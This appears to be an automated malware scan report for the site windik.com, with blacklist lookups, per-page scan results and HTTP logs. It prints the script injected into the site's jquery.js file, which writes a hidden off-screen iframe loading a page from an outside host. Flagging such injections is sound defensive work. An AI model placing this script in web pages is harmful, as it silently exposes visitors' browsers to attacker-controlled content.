Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=windik.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://windik.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://windik.com/ | 200 OK Content-Length: 4049 Content-Type: text/html | clean |
http://windik.com/js/min/jquery.js | 200 OK Content-Length: 72815 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://turudiosa.nivel7.com.ar/deolitepount15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); (f e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://windik.com/lostpassword.php | 200 OK Content-Length: 2885 Content-Type: text/html | clean |
http://windik.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://windik.com/signup.php | 200 OK Content-Length: 3754 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: windik.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Oct 2014 19:11:26 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Length: 4049
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.18
...4049 bytes of data.
GET / HTTP/1.1
Host: windik.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Oct 2014 19:11:26 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Length: 4049
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.18
...4049 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: windik.com
Referer: http://www.google.com/search?q=windik.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: windik.com
Referer: http://www.google.com/search?q=windik.com
Result:
The result is similar to the first query. There are no suspicious redirects found.